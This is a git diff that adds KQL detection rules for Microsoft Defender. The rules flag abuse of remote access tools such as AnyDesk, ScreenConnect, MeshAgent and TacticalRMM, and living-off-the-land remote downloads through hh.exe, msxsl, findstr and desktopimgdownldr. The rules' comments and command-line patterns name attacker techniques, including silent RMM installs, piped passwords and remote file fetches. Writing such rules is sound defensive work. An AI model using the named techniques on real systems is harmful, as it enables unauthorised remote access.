diff --git a/KQL/rules/windows/process_creation/remote_access_tool_anydesk_execution_from_suspicious_folder.kql b/KQL/rules/windows/process_creation/remote_access_tool_anydesk_execution_from_suspicious_folder.kql
new file mode 100644
index 00000000..ac1ebac0
--- /dev/null
+++ b/KQL/rules/windows/process_creation/remote_access_tool_anydesk_execution_from_suspicious_folder.kql
@@ -0,0 +1,14 @@
+// Title: Remote Access Tool - Anydesk Execution From Suspicious Folder
+// Author: Florian Roth (Nextron Systems)
+// Date: 2022-05-20
+// Level: high
+// Description: An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks.
+// These services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment.
+// Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)
+// MITRE Tactic: Command and Control
+// Tags: attack.command-and-control, attack.t1219.002
+// False Positives:
+//   - Legitimate use of AnyDesk from a non-standard folder
+
+DeviceProcessEvents
+| where ((FolderPath endswith "\\AnyDesk.exe" or FolderPath endswith "\\AnyDeskMSI.exe") or ProcessVersionInfoFileDescription =~ "AnyDesk" or ProcessVersionInfoProductName =~ "AnyDesk" or ProcessVersionInfoCompanyName =~ "AnyDesk Software GmbH") and (not((FolderPath contains "\\AppData\\" or FolderPath contains "Program Files (x86)\\AnyDesk" or FolderPath contains "Program Files\\AnyDesk")))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/remote_access_tool_anydesk_execution_with_known_revoked_signing_certificate.kql b/KQL/rules/windows/process_creation/remote_access_tool_anydesk_execution_with_known_revoked_signing_certificate.kql
new file mode 100644
index 00000000..b52c3367
--- /dev/null
+++ b/KQL/rules/windows/process_creation/remote_access_tool_anydesk_execution_with_known_revoked_signing_certificate.kql
@@ -0,0 +1,15 @@
+// Title: Remote Access Tool - AnyDesk Execution With Known Revoked Signing Certificate
+// Author: Sai Prashanth Pulisetti, Nasreddine Bencherchali (Nextron Systems)
+// Date: 2024-02-08
+// Level: medium
+// Description: Detects the execution of an AnyDesk binary with a version prior to 8.0.8.
+// Prior to version 8.0.8, the Anydesk application used a signing certificate that got compromised by threat actors.
+// Use this rule to detect instances of older versions of Anydesk using the compromised certificate
+// This is recommended in order to avoid attackers leveraging the certificate and signing their binaries to bypass detections.
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.initial-access
+// False Positives:
+//   - Unlikely
+
+DeviceProcessEvents
+| where ((FolderPath endswith "\\AnyDesk.exe" or ProcessVersionInfoFileDescription =~ "AnyDesk" or ProcessVersionInfoProductName =~ "AnyDesk" or ProcessVersionInfoCompanyName =~ "AnyDesk Software GmbH") and (ProcessVersionInfoProductVersion startswith "7.0." or ProcessVersionInfoProductVersion startswith "7.1." or ProcessVersionInfoProductVersion startswith "8.0.1" or ProcessVersionInfoProductVersion startswith "8.0.2" or ProcessVersionInfoProductVersion startswith "8.0.3" or ProcessVersionInfoProductVersion startswith "8.0.4" or ProcessVersionInfoProductVersion startswith "8.0.5" or ProcessVersionInfoProductVersion startswith "8.0.6" or ProcessVersionInfoProductVersion startswith "8.0.7")) and (not((ProcessCommandLine contains " --remove" or ProcessCommandLine contains " --uninstall")))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/remote_access_tool_anydesk_piped_password_via_cli.kql b/KQL/rules/windows/process_creation/remote_access_tool_anydesk_piped_password_via_cli.kql
new file mode 100644
index 00000000..1e41e786
--- /dev/null
+++ b/KQL/rules/windows/process_creation/remote_access_tool_anydesk_piped_password_via_cli.kql
@@ -0,0 +1,13 @@
+// Title: Remote Access Tool - AnyDesk Piped Password Via CLI
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-09-28
+// Level: medium
+// Description: Detects piping the password to an anydesk instance via CMD and the '--set-password' flag.
+// MITRE Tactic: Command and Control
+// Tags: attack.command-and-control, attack.t1219.002
+// False Positives:
+//   - Legitimate piping of the password to anydesk
+//   - Some FP could occur with similar tools that uses the same command line '--set-password'
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "/c " and ProcessCommandLine contains "echo " and ProcessCommandLine contains ".exe --set-password"
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/remote_access_tool_anydesk_silent_installation.kql b/KQL/rules/windows/process_creation/remote_access_tool_anydesk_silent_installation.kql
new file mode 100644
index 00000000..527b59fd
--- /dev/null
+++ b/KQL/rules/windows/process_creation/remote_access_tool_anydesk_silent_installation.kql
@@ -0,0 +1,12 @@
+// Title: Remote Access Tool - AnyDesk Silent Installation
+// Author: Ján Trenčanský
+// Date: 2021-08-06
+// Level: high
+// Description: Detects AnyDesk Remote Desktop silent installation. Which can be used by attackers to gain remote access.
+// MITRE Tactic: Command and Control
+// Tags: attack.command-and-control, attack.t1219.002
+// False Positives:
+//   - Legitimate deployment of AnyDesk
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "--install" and ProcessCommandLine contains "--start-with-win" and ProcessCommandLine contains "--silent"
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/remote_access_tool_gotoassist_execution.kql b/KQL/rules/windows/process_creation/remote_access_tool_gotoassist_execution.kql
new file mode 100644
index 00000000..08db274e
--- /dev/null
+++ b/KQL/rules/windows/process_creation/remote_access_tool_gotoassist_execution.kql
@@ -0,0 +1,14 @@
+// Title: Remote Access Tool - GoToAssist Execution
+// Author: frack113
+// Date: 2022-02-13
+// Level: medium
+// Description: An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks.
+// These services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment.
+// Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)
+// MITRE Tactic: Command and Control
+// Tags: attack.command-and-control, attack.t1219.002
+// False Positives:
+//   - Legitimate use
+
+DeviceProcessEvents
+| where ProcessVersionInfoFileDescription =~ "GoTo Opener" or ProcessVersionInfoProductName =~ "GoTo Opener" or ProcessVersionInfoCompanyName =~ "LogMeIn, Inc."
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/remote_access_tool_logmein_execution.kql b/KQL/rules/windows/process_creation/remote_access_tool_logmein_execution.kql
new file mode 100644
index 00000000..8cd185d7
--- /dev/null
+++ b/KQL/rules/windows/process_creation/remote_access_tool_logmein_execution.kql
@@ -0,0 +1,14 @@
+// Title: Remote Access Tool - LogMeIn Execution
+// Author: frack113
+// Date: 2022-02-11
+// Level: medium
+// Description: An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks.
+// These services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment.
+// Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)
+// MITRE Tactic: Command and Control
+// Tags: attack.command-and-control, attack.t1219.002
+// False Positives:
+//   - Legitimate use
+
+DeviceProcessEvents
+| where ProcessVersionInfoFileDescription =~ "LMIGuardianSvc" or ProcessVersionInfoProductName =~ "LMIGuardianSvc" or ProcessVersionInfoCompanyName =~ "LogMeIn, Inc."
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/remote_access_tool_meshagent_command_execution_via_meshcentral.kql b/KQL/rules/windows/process_creation/remote_access_tool_meshagent_command_execution_via_meshcentral.kql
new file mode 100644
index 00000000..bad2e97c
--- /dev/null
+++ b/KQL/rules/windows/process_creation/remote_access_tool_meshagent_command_execution_via_meshcentral.kql
@@ -0,0 +1,13 @@
+// Title: Remote Access Tool - MeshAgent Command Execution via MeshCentral
+// Author: @Kostastsale
+// Date: 2024-09-22
+// Level: medium
+// Description: Detects the use of MeshAgent to execute commands on the target host, particularly when threat actors might abuse it to execute commands directly.
+// MeshAgent can execute commands on the target host by leveraging win-console to obscure their activities and win-dispatcher to run malicious code through IPC with child processes.
+// MITRE Tactic: Command and Control
+// Tags: attack.command-and-control, attack.t1219.002
+// False Positives:
+//   - False positives can be found in environments using MeshAgent for remote management, analysis should prioritize the grandparent process, MeshAgent.exe, and scrutinize the resulting child processes triggered by any suspicious interactive commands directed at the target host.
+
+DeviceProcessEvents
+| where (FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe") and InitiatingProcessFolderPath endswith "\\meshagent.exe"
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/remote_access_tool_netsupport_execution.kql b/KQL/rules/windows/process_creation/remote_access_tool_netsupport_execution.kql
new file mode 100644
index 00000000..93c2c113
--- /dev/null
+++ b/KQL/rules/windows/process_creation/remote_access_tool_netsupport_execution.kql
@@ -0,0 +1,14 @@
+// Title: Remote Access Tool - NetSupport Execution
+// Author: frack113
+// Date: 2022-09-25
+// Level: medium
+// Description: An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks.
+// These services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment.
+// Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)
+// MITRE Tactic: Command and Control
+// Tags: attack.command-and-control, attack.t1219.002
+// False Positives:
+//   - Legitimate use
+
+DeviceProcessEvents
+| where ProcessVersionInfoFileDescription =~ "NetSupport Client Configurator" or ProcessVersionInfoProductName =~ "NetSupport Remote Control" or ProcessVersionInfoCompanyName =~ "NetSupport Ltd" or ProcessVersionInfoOriginalFileName =~ "PCICFGUI.EXE"
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/remote_access_tool_potential_meshagent_execution_windows.kql b/KQL/rules/windows/process_creation/remote_access_tool_potential_meshagent_execution_windows.kql
new file mode 100644
index 00000000..6612de57
--- /dev/null
+++ b/KQL/rules/windows/process_creation/remote_access_tool_potential_meshagent_execution_windows.kql
@@ -0,0 +1,14 @@
+// Title: Remote Access Tool - Potential MeshAgent Execution - Windows
+// Author: Norbert Jaśniewicz (AlphaSOC)
+// Date: 2025-05-19
+// Level: medium
+// Description: Detects potential execution of MeshAgent which is a tool used for remote access.
+// Historical data shows that threat actors rename MeshAgent binary to evade detection.
+// Matching command lines with the '--meshServiceName' argument can indicate that the MeshAgent is being used for remote access.
+// MITRE Tactic: Command and Control
+// Tags: attack.command-and-control, attack.t1219.002
+// False Positives:
+//   - Environments that legitimately use MeshAgent
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "--meshServiceName"
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/remote_access_tool_renamed_meshagent_execution_windows.kql b/KQL/rules/windows/process_creation/remote_access_tool_renamed_meshagent_execution_windows.kql
new file mode 100644
index 00000000..390b946e
--- /dev/null
+++ b/KQL/rules/windows/process_creation/remote_access_tool_renamed_meshagent_execution_windows.kql
@@ -0,0 +1,12 @@
+// Title: Remote Access Tool - Renamed MeshAgent Execution - Windows
+// Author: Norbert Jaśniewicz (AlphaSOC)
+// Date: 2025-05-19
+// Level: high
+// Description: Detects the execution of a renamed instance of the Remote Monitoring and Management (RMM) tool, MeshAgent.
+// RMM tools such as MeshAgent are commonly utilized by IT administrators for legitimate remote support and system management.
+// However, malicious actors may exploit these tools by renaming them to bypass detection mechanisms, enabling unauthorized access and control over compromised systems.
+// MITRE Tactic: Command and Control
+// Tags: attack.command-and-control, attack.defense-evasion, attack.t1219.002, attack.t1036.003
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "--meshServiceName" or ProcessVersionInfoOriginalFileName contains "meshagent") and (not(FolderPath endswith "\\meshagent.exe"))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/remote_access_tool_rurat_execution_from_unusual_location.kql b/KQL/rules/windows/process_creation/remote_access_tool_rurat_execution_from_unusual_location.kql
new file mode 100644
index 00000000..2d3a7a36
--- /dev/null
+++ b/KQL/rules/windows/process_creation/remote_access_tool_rurat_execution_from_unusual_location.kql
@@ -0,0 +1,10 @@
+// Title: Remote Access Tool - RURAT Execution From Unusual Location
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-09-19
+// Level: medium
+// Description: Detects execution of Remote Utilities RAT (RURAT) from an unusual location (outside of 'C:\Program Files')
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion
+
+DeviceProcessEvents
+| where ((FolderPath endswith "\\rutserv.exe" or FolderPath endswith "\\rfusclient.exe") or ProcessVersionInfoProductName =~ "Remote Utilities") and (not((FolderPath startswith "C:\\Program Files\\Remote Utilities" or FolderPath startswith "C:\\Program Files (x86)\\Remote Utilities")))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/remote_access_tool_screenconnect_execution.kql b/KQL/rules/windows/process_creation/remote_access_tool_screenconnect_execution.kql
new file mode 100644
index 00000000..c61219c6
--- /dev/null
+++ b/KQL/rules/windows/process_creation/remote_access_tool_screenconnect_execution.kql
@@ -0,0 +1,14 @@
+// Title: Remote Access Tool - ScreenConnect Execution
+// Author: frack113
+// Date: 2022-02-13
+// Level: medium
+// Description: An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks.
+// These services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment.
+// Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)
+// MITRE Tactic: Command and Control
+// Tags: attack.command-and-control, attack.t1219.002
+// False Positives:
+//   - Legitimate usage of the tool
+
+DeviceProcessEvents
+| where ProcessVersionInfoFileDescription =~ "ScreenConnect Service" or ProcessVersionInfoProductName =~ "ScreenConnect" or ProcessVersionInfoCompanyName =~ "ScreenConnect Software"
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/remote_access_tool_screenconnect_installation_execution.kql b/KQL/rules/windows/process_creation/remote_access_tool_screenconnect_installation_execution.kql
new file mode 100644
index 00000000..5a3e8d1e
--- /dev/null
+++ b/KQL/rules/windows/process_creation/remote_access_tool_screenconnect_installation_execution.kql
@@ -0,0 +1,12 @@
+// Title: Remote Access Tool - ScreenConnect Installation Execution
+// Author: Florian Roth (Nextron Systems)
+// Date: 2021-02-11
+// Level: medium
+// Description: Detects ScreenConnect program starts that establish a remote access to a system.
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.initial-access, attack.t1133
+// False Positives:
+//   - Legitimate use by administrative staff
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "e=Access&" and ProcessCommandLine contains "y=Guest&" and ProcessCommandLine contains "&p=" and ProcessCommandLine contains "&c=" and ProcessCommandLine contains "&k="
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/remote_access_tool_screenconnect_potential_suspicious_remote_command_execution.kql b/KQL/rules/windows/process_creation/remote_access_tool_screenconnect_potential_suspicious_remote_command_execution.kql
new file mode 100644
index 00000000..8ba05d1c
--- /dev/null
+++ b/KQL/rules/windows/process_creation/remote_access_tool_screenconnect_potential_suspicious_remote_command_execution.kql
@@ -0,0 +1,12 @@
+// Title: Remote Access Tool - ScreenConnect Potential Suspicious Remote Command Execution
+// Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems), @Kostastsale
+// Date: 2022-02-25
+// Level: medium
+// Description: Detects potentially suspicious child processes launched via the ScreenConnect client service.
+// MITRE Tactic: Command and Control
+// Tags: attack.command-and-control, attack.t1219.002
+// False Positives:
+//   - If the script being executed make use of any of the utilities mentioned in the detection then they should filtered out or allowed.
+
+DeviceProcessEvents
+| where (FolderPath endswith "\\bitsadmin.exe" or FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\curl.exe" or FolderPath endswith "\\dllhost.exe" or FolderPath endswith "\\net.exe" or FolderPath endswith "\\nltest.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\rundll32.exe" or FolderPath endswith "\\wevtutil.exe") and (InitiatingProcessCommandLine contains ":\\Windows\\TEMP\\ScreenConnect\\" and InitiatingProcessCommandLine contains "run.cmd")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/remote_access_tool_screenconnect_remote_command_execution.kql b/KQL/rules/windows/process_creation/remote_access_tool_screenconnect_remote_command_execution.kql
new file mode 100644
index 00000000..41bc9f2f
--- /dev/null
+++ b/KQL/rules/windows/process_creation/remote_access_tool_screenconnect_remote_command_execution.kql
@@ -0,0 +1,12 @@
+// Title: Remote Access Tool - ScreenConnect Remote Command Execution
+// Author: Ali Alwashali
+// Date: 2023-10-10
+// Level: low
+// Description: Detects the execution of a system command via the ScreenConnect RMM service.
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059.003
+// False Positives:
+//   - Legitimate use of ScreenConnect. Disable this rule if ScreenConnect is heavily used.
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "\\TEMP\\ScreenConnect\\" and (FolderPath endswith "\\cmd.exe" or ProcessVersionInfoOriginalFileName =~ "Cmd.Exe") and InitiatingProcessFolderPath endswith "\\ScreenConnect.ClientService.exe"
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/remote_access_tool_screenconnect_server_web_shell_execution.kql b/KQL/rules/windows/process_creation/remote_access_tool_screenconnect_server_web_shell_execution.kql
new file mode 100644
index 00000000..f2a05efe
--- /dev/null
+++ b/KQL/rules/windows/process_creation/remote_access_tool_screenconnect_server_web_shell_execution.kql
@@ -0,0 +1,12 @@
+// Title: Remote Access Tool - ScreenConnect Server Web Shell Execution
+// Author: Jason Rathbun (Blackpoint Cyber)
+// Date: 2024-02-26
+// Level: high
+// Description: Detects potential web shell execution from the ScreenConnect server process.
+// MITRE Tactic: Initial Access
+// Tags: attack.initial-access, attack.t1190
+// False Positives:
+//   - Unlikely
+
+DeviceProcessEvents
+| where (FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\csc.exe") and InitiatingProcessFolderPath endswith "\\ScreenConnect.Service.exe"
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/remote_access_tool_simple_help_execution.kql b/KQL/rules/windows/process_creation/remote_access_tool_simple_help_execution.kql
new file mode 100644
index 00000000..296cee81
--- /dev/null
+++ b/KQL/rules/windows/process_creation/remote_access_tool_simple_help_execution.kql
@@ -0,0 +1,14 @@
+// Title: Remote Access Tool - Simple Help Execution
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2024-02-23
+// Level: medium
+// Description: An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks.
+// These services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment.
+// Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)
+// MITRE Tactic: Command and Control
+// Tags: attack.command-and-control, attack.t1219.002
+// False Positives:
+//   - Legitimate usage of the tool
+
+DeviceProcessEvents
+| where (FolderPath contains "\\JWrapper-Remote Access\\" or FolderPath contains "\\JWrapper-Remote Support\\") and FolderPath endswith "\\SimpleService.exe"
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/remote_access_tool_tacticalrmm_agent_registration_to_potentially_attacker_controlled_server.kql b/KQL/rules/windows/process_creation/remote_access_tool_tacticalrmm_agent_registration_to_potentially_attacker_controlled_server.kql
new file mode 100644
index 00000000..06bc159c
--- /dev/null
+++ b/KQL/rules/windows/process_creation/remote_access_tool_tacticalrmm_agent_registration_to_potentially_attacker_controlled_server.kql
@@ -0,0 +1,14 @@
+// Title: Remote Access Tool - TacticalRMM Agent Registration to Potentially Attacker-Controlled Server
+// Author: Ahmed Nosir (@egycondor)
+// Date: 2025-05-29
+// Level: medium
+// Description: Detects TacticalRMM agent installations where the --api, --auth, and related flags are used on the command line.
+// These parameters configure the agent to connect to a specific RMM server with authentication, client ID, and site ID.
+// This technique could indicate a threat actor attempting to register the agent with an attacker-controlled RMM infrastructure silently.
+// MITRE Tactic: Command and Control
+// Tags: attack.command-and-control, attack.t1219, attack.t1105
+// False Positives:
+//   - Legitimate system administrator deploying TacticalRMM
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "--api" and ProcessCommandLine contains "--auth" and ProcessCommandLine contains "--client-id" and ProcessCommandLine contains "--site-id" and ProcessCommandLine contains "--agent-type") and FolderPath contains "\\TacticalAgent\\tacticalrmm.exe"
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/remote_access_tool_team_viewer_session_started_on_windows_host.kql b/KQL/rules/windows/process_creation/remote_access_tool_team_viewer_session_started_on_windows_host.kql
new file mode 100644
index 00000000..d3f23e31
--- /dev/null
+++ b/KQL/rules/windows/process_creation/remote_access_tool_team_viewer_session_started_on_windows_host.kql
@@ -0,0 +1,13 @@
+// Title: Remote Access Tool - Team Viewer Session Started On Windows Host
+// Author: Josh Nickels, Qi Nan
+// Date: 2024-03-11
+// Level: low
+// Description: Detects the command line executed when TeamViewer starts a session started by a remote host.
+// Once a connection has been started, an investigator can verify the connection details by viewing the "incoming_connections.txt" log file in the TeamViewer folder.
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.initial-access, attack.t1133
+// False Positives:
+//   - Legitimate usage of TeamViewer
+
+DeviceProcessEvents
+| where ProcessCommandLine endswith "TeamViewer_Desktop.exe --IPCport 5939 --Module 1" and FolderPath =~ "TeamViewer_Desktop.exe" and InitiatingProcessFolderPath =~ "TeamViewer_Service.exe"
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/remote_access_tool_ultraviewer_execution.kql b/KQL/rules/windows/process_creation/remote_access_tool_ultraviewer_execution.kql
new file mode 100644
index 00000000..cc5c040e
--- /dev/null
+++ b/KQL/rules/windows/process_creation/remote_access_tool_ultraviewer_execution.kql
@@ -0,0 +1,14 @@
+// Title: Remote Access Tool - UltraViewer Execution
+// Author: frack113
+// Date: 2022-09-25
+// Level: medium
+// Description: An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks.
+// These services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment.
+// Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)
+// MITRE Tactic: Command and Control
+// Tags: attack.command-and-control, attack.t1219.002
+// False Positives:
+//   - Legitimate use
+
+DeviceProcessEvents
+| where ProcessVersionInfoProductName =~ "UltraViewer" or ProcessVersionInfoCompanyName =~ "DucFabulous Co,ltd" or ProcessVersionInfoOriginalFileName =~ "UltraViewer_Desktop.exe"
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/remote_chm_file_download_execution_via_hh_exe.kql b/KQL/rules/windows/process_creation/remote_chm_file_download_execution_via_hh_exe.kql
new file mode 100644
index 00000000..4c8c2c45
--- /dev/null
+++ b/KQL/rules/windows/process_creation/remote_chm_file_download_execution_via_hh_exe.kql
@@ -0,0 +1,10 @@
+// Title: Remote CHM File Download/Execution Via HH.EXE
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-09-29
+// Level: high
+// Description: Detects the usage of "hh.exe" to execute/download remotely hosted ".chm" files.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1218.001
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "http://" or ProcessCommandLine contains "https://" or ProcessCommandLine contains "\\\\") and (ProcessVersionInfoOriginalFileName =~ "HH.exe" or FolderPath endswith "\\hh.exe")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/remote_code_execute_via_winrm_vbs.kql b/KQL/rules/windows/process_creation/remote_code_execute_via_winrm_vbs.kql
new file mode 100644
index 00000000..6053c9df
--- /dev/null
+++ b/KQL/rules/windows/process_creation/remote_code_execute_via_winrm_vbs.kql
@@ -0,0 +1,10 @@
+// Title: Remote Code Execute via Winrm.vbs
+// Author: Julia Fomina, oscd.community
+// Date: 2020-10-07
+// Level: medium
+// Description: Detects an attempt to execute code or create service on remote host via winrm.vbs.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1216
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "winrm" and ProcessCommandLine contains "invoke Create wmicimv2/Win32_" and ProcessCommandLine contains "-r:http") and (FolderPath endswith "\\cscript.exe" or ProcessVersionInfoOriginalFileName =~ "cscript.exe")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/remote_file_download_via_desktopimgdownldr_utility.kql b/KQL/rules/windows/process_creation/remote_file_download_via_desktopimgdownldr_utility.kql
new file mode 100644
index 00000000..3a5ebb05
--- /dev/null
+++ b/KQL/rules/windows/process_creation/remote_file_download_via_desktopimgdownldr_utility.kql
@@ -0,0 +1,10 @@
+// Title: Remote File Download Via Desktopimgdownldr Utility
+// Author: Tim Rauch, Elastic (idea)
+// Date: 2022-09-27
+// Level: medium
+// Description: Detects the desktopimgdownldr utility being used to download a remote file. An adversary may use desktopimgdownldr to download arbitrary files as an alternative to certutil.
+// MITRE Tactic: Command and Control
+// Tags: attack.command-and-control, attack.t1105
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "/lockscreenurl:http" and FolderPath endswith "\\desktopimgdownldr.exe" and InitiatingProcessFolderPath endswith "\\desktopimgdownldr.exe"
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/remote_file_download_via_findstr_exe.kql b/KQL/rules/windows/process_creation/remote_file_download_via_findstr_exe.kql
new file mode 100644
index 00000000..4f2df68f
--- /dev/null
+++ b/KQL/rules/windows/process_creation/remote_file_download_via_findstr_exe.kql
@@ -0,0 +1,10 @@
+// Title: Remote File Download Via Findstr.EXE
+// Author: Furkan CALISKAN, @caliskanfurkan_, @oscd_initiative, Nasreddine Bencherchali (Nextron Systems)
+// Date: 2020-10-05
+// Level: medium
+// Description: Detects execution of "findstr" with specific flags and a remote share path. This specific set of CLI flags would allow "findstr" to download the content of the file located on the remote share as described in the LOLBAS entry.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.credential-access, attack.command-and-control, attack.t1218, attack.t1564.004, attack.t1552.001, attack.t1105
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "findstr" or FolderPath endswith "findstr.exe" or ProcessVersionInfoOriginalFileName =~ "FINDSTR.EXE") and ((ProcessCommandLine contains " -v " or ProcessCommandLine contains " /v " or ProcessCommandLine contains " –v " or ProcessCommandLine contains " —v " or ProcessCommandLine contains " ―v ") and (ProcessCommandLine contains " -l " or ProcessCommandLine contains " /l " or ProcessCommandLine contains " –l " or ProcessCommandLine contains " —l " or ProcessCommandLine contains " ―l ") and ProcessCommandLine contains "\\\\")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/remote_powershell_session_host_process_winrm_.kql b/KQL/rules/windows/process_creation/remote_powershell_session_host_process_winrm_.kql
new file mode 100644
index 00000000..bf8492a6
--- /dev/null
+++ b/KQL/rules/windows/process_creation/remote_powershell_session_host_process_winrm_.kql
@@ -0,0 +1,12 @@
+// Title: Remote PowerShell Session Host Process (WinRM)
+// Author: Roberto Rodriguez @Cyb3rWard0g
+// Date: 2019-09-12
+// Level: medium
+// Description: Detects remote PowerShell sections by monitoring for wsmprovhost (WinRM host process) as a parent or child process (sign of an active PowerShell remote session).
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.lateral-movement, attack.t1059.001, attack.t1021.006
+// False Positives:
+//   - Legitimate usage of remote Powershell, e.g. for monitoring purposes.
+
+DeviceProcessEvents
+| where FolderPath endswith "\\wsmprovhost.exe" or InitiatingProcessFolderPath endswith "\\wsmprovhost.exe"
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/remote_xsl_execution_via_msxsl_exe.kql b/KQL/rules/windows/process_creation/remote_xsl_execution_via_msxsl_exe.kql
new file mode 100644
index 00000000..87d6e351
--- /dev/null
+++ b/KQL/rules/windows/process_creation/remote_xsl_execution_via_msxsl_exe.kql
@@ -0,0 +1,12 @@
+// Title: Remote XSL Execution Via Msxsl.EXE
+// Author: Swachchhanda Shrawan Poudel
+// Date: 2023-11-09
+// Level: high
+// Description: Detects the execution of the "msxsl" binary with an "http" keyword in the command line. This might indicate a potential remote execution of XSL files.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1220
+// False Positives:
+//   - Msxsl is not installed by default and is deprecated, so unlikely on most systems.
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "http" and FolderPath endswith "\\msxsl.exe"
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/remotefxvgpudisablement_abuse_via_atomictestharnesses.kql b/KQL/rules/windows/process_creation/remotefxvgpudisablement_abuse_via_atomictestharnesses.kql
new file mode 100644
index 00000000..98fe8929
--- /dev/null
+++ b/KQL/rules/windows/process_creation/remotefxvgpudisablement_abuse_via_atomictestharnesses.kql
@@ -0,0 +1,10 @@
+// Title: RemoteFXvGPUDisablement Abuse Via AtomicTestHarnesses
+// Author: frack113
+// Date: 2021-07-13
+// Level: high
+// Description: Detects calls to the AtomicTestHarnesses "Invoke-ATHRemoteFXvGPUDisablementCommand" which is designed to abuse the "RemoteFXvGPUDisablement.exe" binary to run custom PowerShell code via module load-order hijacking.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1218
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "Invoke-ATHRemoteFXvGPUDisablementCommand" or ProcessCommandLine contains "Invoke-ATHRemoteFXvGPUDisableme"
\ No newline at end of file
